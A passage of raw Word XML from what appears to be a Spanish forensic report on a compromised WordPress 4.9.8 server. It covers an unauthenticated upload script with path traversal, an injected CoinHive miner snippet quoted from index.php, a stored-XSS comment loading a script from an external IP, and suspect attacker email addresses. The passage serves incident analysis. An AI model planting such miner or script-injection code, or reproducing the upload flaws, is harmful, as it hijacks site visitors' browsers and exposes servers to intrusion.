          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, el cual gestiona el </w:t>
      </w:r>
      <w:r w:rsidRPr="005579DA">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>WordPress 4.9.8</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> citado anteriormente se observan las siguientes vulnerabilidades.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="483CD8E2" w14:textId="77777777" w:rsidR="00BB78C7" w:rsidRDefault="00BB78C7">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="24"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A603CF">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve"> Control de Extensiones de Archivos:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="615927B2" w14:textId="77777777" w:rsidR="00BB78C7" w:rsidRPr="005579DA" w:rsidRDefault="00BB78C7">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="24"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005579DA">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>$allowedExtensions = array();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3454D073" w14:textId="77777777" w:rsidR="00BB78C7" w:rsidRDefault="00BB78C7">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="24"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A603CF">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Manejo de Directorios:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34CD9E20" w14:textId="77777777" w:rsidR="00BB78C7" w:rsidRDefault="00BB78C7">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="24"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A603CF">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">El script parece crear y escribir en directorios basados en entradas de usuario </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">del tipo </w:t>
      </w:r>
      <w:r w:rsidRPr="005579DA">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>../../../../../uploads/'.$_GET['Year'].'/'.$_GET['Month'].'/'.</w:t>
      </w:r>
      <w:r w:rsidRPr="00A603CF">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F37FD01" w14:textId="77777777" w:rsidR="00BB78C7" w:rsidRDefault="00BB78C7">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="24"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A603CF">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Falta de Autenticación y Autorización:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31F1DEDD" w14:textId="77777777" w:rsidR="00BB78C7" w:rsidRPr="00D87C09" w:rsidRDefault="00BB78C7">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="24"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D87C09">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Esto puede exponer el sistema a cargas no autorizadas.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26FF9369" w14:textId="7A33500F" w:rsidR="00BB78C7" w:rsidRPr="00D87C09" w:rsidRDefault="00BB78C7">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="24"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D87C09">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Se detecta un virus en el archivo </w:t>
      </w:r>
      <w:r w:rsidRPr="005579DA">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>/var/www/html/index.php</w:t>
      </w:r>
      <w:r w:rsidRPr="00D87C09">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> del tipo Trojan:JS/CoinHive.B. se observa el siguiente script dentro del archivo</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35C6F5CB" w14:textId="77777777" w:rsidR="00BB78C7" w:rsidRPr="005F4506" w:rsidRDefault="00BB78C7">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="24"/>
        </w:numPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005F4506">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>var miner = new CoinHive.Anonymous('pvvxSQ6RzN3K5IY9F5fFHvahAFNreg3u', {throttle: 0.2});</w:t>
      </w:r>
      <w:r w:rsidRPr="005F4506">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:br/>
        <w:t>miner.start();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CD02DA3" w14:textId="77777777" w:rsidR="00BB78C7" w:rsidRPr="000F327A" w:rsidRDefault="00BB78C7">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="24"/>
        </w:numPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="000F327A">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">El archivo </w:t>
      </w:r>
      <w:r w:rsidRPr="005F4506">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>/var/log/mysql/error.log</w:t>
      </w:r>
      <w:r w:rsidRPr="000F327A">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> está vacío.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4973853B" w14:textId="77777777" w:rsidR="00BB78C7" w:rsidRPr="009B7401" w:rsidRDefault="00BB78C7">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="24"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009B7401">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Se observa el registro del usuario anatoly5676, posteriormente, este realiza una serie de acciones en el servidor web usando los comentarios de la web.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FCAF90E" w14:textId="17EA7482" w:rsidR="00BB78C7" w:rsidRPr="009B7401" w:rsidRDefault="00244926">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="24"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009B7401">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Envía</w:t>
      </w:r>
      <w:r w:rsidR="00BB78C7" w:rsidRPr="009B7401">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> un comentario vacío.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58C17902" w14:textId="77777777" w:rsidR="00BB78C7" w:rsidRPr="009B7401" w:rsidRDefault="00BB78C7">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="24"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009B7401">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Manda un comentario haciendo referencia a visitar el enlace </w:t>
      </w:r>
      <w:hyperlink r:id="rId269" w:history="1">
        <w:r w:rsidRPr="009B7401">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:rFonts w:cs="Arial"/>
            <w:szCs w:val="22"/>
          </w:rPr>
          <w:t>http://18.195.165.56</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="009B7401">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> la cual no es https por lo que la comunicación puede estar siendo intervenida.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="114C235C" w14:textId="77777777" w:rsidR="00BB78C7" w:rsidRPr="009B7401" w:rsidRDefault="00BB78C7">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009B7401">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Manda otro correo electrónico, que al estar en un navegador servidor web este, se ocultará en su visionado.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30F54DE6" w14:textId="0556C409" w:rsidR="00BB78C7" w:rsidRDefault="00BB78C7">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005F4506">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>&lt;script src="http://18.195.165.56/stat.js"&gt;&lt;/script&gt;</w:t>
      </w:r>
      <w:r w:rsidR="005F4506">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DBA435A" w14:textId="308BB1DE" w:rsidR="00BB78C7" w:rsidRDefault="00BB78C7">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Todas las acciones anteriores pudieran ser que se ha ejecutado un posible ataque de </w:t>
      </w:r>
      <w:r w:rsidR="004D52A1">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Cross-S</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>ite</w:t>
      </w:r>
      <w:r w:rsidR="004D52A1">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> S</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>cripting(XSS)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DB6A284" w14:textId="2F09718A" w:rsidR="00BB78C7" w:rsidRDefault="00BB78C7">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Analizando </w:t>
      </w:r>
      <w:r w:rsidR="004D52A1">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>líneas</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> de código de la base de datos, se encuentran las siguientes sentencias dentro de </w:t>
      </w:r>
      <w:r w:rsidRPr="005F4506">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>index.db</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, lo que puede suponer una alteración de la base de datos.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6285A573" w14:textId="77777777" w:rsidR="00BB78C7" w:rsidRPr="005F4506" w:rsidRDefault="00BB78C7">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005F4506">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Permit user logins after boot, prohibit user logins at shutdown.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77268BFA" w14:textId="77777777" w:rsidR="0030615C" w:rsidRDefault="00BB78C7">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005F4506">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Ukrainian character set encoded in octal, decimal, and hexadecimalmcookie.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="116D7958" w14:textId="3F4C8F69" w:rsidR="00BB78C7" w:rsidRPr="0030615C" w:rsidRDefault="00BB78C7">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0030615C">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>The Swiss Army Knife of Embedded Linuxrsh.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FD4D932" w14:textId="77777777" w:rsidR="00BB78C7" w:rsidRPr="005F4506" w:rsidRDefault="00BB78C7">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005F4506">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Initialize a terminal or query terminfo databasenologin.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="139D1DCC" w14:textId="77777777" w:rsidR="00BB78C7" w:rsidRPr="0030615C" w:rsidRDefault="00BB78C7">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0030615C">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Relativo al posible autor de los hechos, se pueden deducir las siguientes cuentas de correo electrónico:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D8CCB4B" w14:textId="77777777" w:rsidR="00BB78C7" w:rsidRPr="0030615C" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId270" w:history="1">
        <w:r w:rsidR="00BB78C7" w:rsidRPr="0030615C">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:rFonts w:cs="Arial"/>
            <w:szCs w:val="22"/>
          </w:rPr>
          <w:t>anatoly12312@mailinator.com</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00BB78C7" w:rsidRPr="0030615C">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:hyperlink r:id="rId271" w:history="1">
        <w:r w:rsidR="00BB78C7" w:rsidRPr="0030615C">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:rFonts w:cs="Arial"/>
            <w:szCs w:val="22"/>
          </w:rPr>
          <w:t>anatoly5676@grr.la</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00BB78C7" w:rsidRPr="0030615C">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:hyperlink r:id="rId272" w:history="1">
        <w:r w:rsidR="00BB78C7" w:rsidRPr="0030615C">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:rFonts w:cs="Arial"/>
            <w:szCs w:val="22"/>
          </w:rPr>
          <w:t>anatoly5676anatoly5676@grr.la</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00BB78C7" w:rsidRPr="0030615C">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:hyperlink r:id="rId273" w:history="1">
        <w:r w:rsidR="00BB78C7" w:rsidRPr="0030615C">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:rFonts w:cs="Arial"/>
            <w:szCs w:val="22"/>
          </w:rPr>
          <w:t>anatolyhpxecjqa@grr.la</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00BB78C7" w:rsidRPr="0030615C">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:hyperlink r:id="rId274" w:history="1">
        <w:r w:rsidR="00BB78C7" w:rsidRPr="0030615C">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:rFonts w:cs="Arial"/>
            <w:szCs w:val="22"/>
          </w:rPr>
          <w:t>bs.jckcy3j43batzml8vbw25u1y5zm1anatoly5676anatoly5676@grr.la</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00BB78C7" w:rsidRPr="0030615C">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:hyperlink r:id="rId275" w:history="1">
        <w:r w:rsidR="00BB78C7" w:rsidRPr="0030615C">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:rFonts w:cs="Arial"/>
            <w:szCs w:val="22"/>
          </w:rPr>
          <w:t>bwlddhjadekqa7qcrz3rsasoqxufzp1anatoly5676anatoly5676@grr.la</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00BB78C7" w:rsidRPr="0030615C">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:hyperlink r:id="rId276" w:history="1">
        <w:r w:rsidR="00BB78C7" w:rsidRPr="0030615C">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:rFonts w:cs="Arial"/>
            <w:szCs w:val="22"/>
          </w:rPr>
          <w:t>fanatoly12312@mailinator.com</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00BB78C7" w:rsidRPr="0030615C">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:hyperlink r:id="rId277" w:history="1">
        <w:r w:rsidR="00BB78C7" w:rsidRPr="0030615C">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:rFonts w:cs="Arial"/>
            <w:szCs w:val="22"/>
          </w:rPr>
          <w:t>hpxecjqa@grr.la</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00BB78C7" w:rsidRPr="0030615C">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:hyperlink r:id="rId278" w:history="1">
        <w:r w:rsidR="00BB78C7" w:rsidRPr="0030615C">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:rFonts w:cs="Arial"/>
            <w:szCs w:val="22"/>
          </w:rPr>
          <w:t>pafzzj0anatoly12312anatoly12312@mailinator.com</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00BB78C7" w:rsidRPr="0030615C">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D5FA7DA" w14:textId="77777777" w:rsidR="00BB78C7" w:rsidRPr="0030615C" w:rsidRDefault="00BB78C7">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0030615C">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Se observa, dentro de la cantidad de emails relativos a Anatoly, que también use </w:t>
      </w:r>
      <w:hyperlink r:id="rId279" w:history="1">
        <w:r w:rsidRPr="0030615C">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:rFonts w:cs="Arial"/>
            <w:szCs w:val="22"/>
          </w:rPr>
          <w:t>anatoly12312@mailinator.com</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="0030615C">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, correo con el mismo dominio que </w:t>
      </w:r>
      <w:hyperlink r:id="rId280" w:tooltip="mailto:test12312321@mailinator.com" w:history="1">
        <w:r w:rsidRPr="0030615C">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:rFonts w:cs="Arial"/>
            <w:szCs w:val="22"/>
          </w:rPr>
          <w:t>test12312321@mailinator.com</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="0030615C">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E640088" w14:textId="77777777" w:rsidR="00F01FF5" w:rsidRPr="005579DA" w:rsidRDefault="00F01FF5" w:rsidP="00F01FF5">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005579DA">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>CONCLUSION:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D9FBF42" w14:textId="5E2D218A" w:rsidR="00DC4235" w:rsidRPr="005579DA" w:rsidRDefault="00DC4235" w:rsidP="00DC4235">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
